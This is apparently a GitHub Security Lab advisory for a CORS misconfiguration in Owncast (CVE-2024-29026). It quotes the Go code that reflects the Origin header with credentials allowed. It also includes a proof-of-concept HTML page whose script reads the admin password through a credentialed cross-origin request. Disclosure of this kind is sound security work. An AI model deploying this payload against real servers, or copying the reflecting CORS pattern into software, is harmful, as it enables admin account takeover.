Coordinated Disclosure Timeline
- 2023-12-08: Sent Advisory
- 2023-12-18: Issue patched to only allow localhost CORS access.
Summary
A lenient CORS policy allows attackers to make a cross origin request, reading privileged information. This can be used to leak the admin password.
Project
Owncast
Tested Version
Details
Cors Misconfiguration in auth.go (GHSL-2023-261)
The CORS handler for admin functions reflects the Origin header, allowing an attacker website to make an authenticated cross origin request.
w.Header().Set("Access-Control-Allow-Origin", r.Header.Get("Origin"))
w.Header().Set("Access-Control-Allow-Credentials", "true")
w.Header().Set("Access-Control-Allow-Headers", "Origin, X-Requested-With, Content-Type, Accept, Authorization")
This vulnerability was found with the help of the CodeQL CORS Query.
Impact
This issue may lead to Account Takeover
Resources
An attacker can host the following html file on their website. When accessed by a logged in admin of owncast, the website will steal the admin password and display it in an alert.
<html>
<body>
<script>
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
if (xhr.readyState == XMLHttpRequest.DONE) {
alert(xhr.responseText);
}
}
xhr.open('GET', 'http://owncast.domain/api/admin/serverconfig', true);
xhr.withCredentials = true;
xhr.send(null);
</script>
</body>
</html>
CVE
- CVE-2024-29026
Credit
This issue was discovered and reported by GHSL team member @Kwstubbs (Kevin Stubbings).
Contact
You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2023-261 in any communication regarding this issue.